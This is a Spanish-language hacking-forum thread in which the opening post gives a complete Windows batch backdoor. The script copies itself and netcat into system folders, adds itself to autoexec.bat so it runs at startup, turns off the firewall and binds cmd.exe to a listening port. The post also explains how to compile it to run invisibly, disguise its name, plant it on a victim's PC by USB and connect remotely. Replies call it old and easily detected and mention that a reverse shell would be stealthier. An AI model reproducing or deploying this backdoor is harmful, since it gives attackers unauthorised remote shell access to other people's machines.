Test Foro de elhacker.net SMF 2.1

Seguridad Informática => Análisis y Diseño de Malware => Mensaje iniciado por: _TTFH_3500 en 6 Junio 2014, 16:41 PM

Título: El Backdoor más simple y eficiente
Publicado por: _TTFH_3500 en 6 Junio 2014, 16:41 PM
Compilamos el siguiente codigo con Bat2Exe PRO y elegimos la opción "Start Invisible (NO CONSOLE window)" En el codigo cambiamos "Backdoor.exe" por cualquier nombre porque sino sería muy obio y en "3500" escribimos el puerto que quieramos.

Código (dos) [Seleccionar]
@echo off
IF exist %windir%\[i]Backdoor.exe[/i] goto :on
copy /y [i]Backdoor.exe[/i] %windir%
copy /y nc.exe %windir%\System32
echo start %windir%\[i]Backdoor.exe[/i]>>autoexec.bat
:on
netsh firewall set opmode mode=disable
nc -L -d -e cmd.exe -p [b]3500[/b]
pause>nul



Para acceder a la PC que tiene instalado en Backdoor escribimos en CMD:

nc -vv IPvictima PUERTO


Para instalar el Backdoor en la PC de la victima copiamos nuetro backdoor compilado y el archivo nc.exe (que una version reducida del NetCat que se puede descargar de este foro) a un Pendrive y iniciamos el Backdoor.exe, este se copiara a C:\Windows\ porque es una ubicación facíl de localizar y donde ninguna persona normal miraría y el NetCat debe estar en System32 para que se abra desde CMD al escribir nc.

IMPORTANTE: en nuestra pc en System32 tambien tenemos que tener el archivo nc.exe

Título: Re: El Backdoor más simple y eficiente
Publicado por: Shell Root en 6 Junio 2014, 16:53 PM
Re-viejo y Re-detectado
Título: Re: El Backdoor más simple y eficiente
Publicado por: Gh057 en 6 Junio 2014, 17:05 PM
Cita de: _TTFH_3500 en  6 Junio 2014, 16:41 PM
... este se copiara a C:\Windows\ porque es una ubicación facíl de localizar y donde ninguna persona normal miraría y el NetCat debe estar en System32 para que se abra desde CMD al escribir nc...
:rolleyes:
Título: Re: El Backdoor más simple y eficiente
Publicado por: Vaagish en 6 Junio 2014, 19:36 PM
No hay manera que no lo detecte un AV.. inclusive sin tener uno instalado  :xD
Título: Re: El Backdoor más simple y eficiente
Publicado por: daryo en 6 Junio 2014, 21:23 PM
si casi todas las versiones de netcat son detectadas . hacer una shell inversa con cualquier lenguaje de programacion es sencillo y es mucho mas indetectable xD.

ademas eso de desactivar  por consola a el firewall no funciona amenos que se tengan permisos de admin :)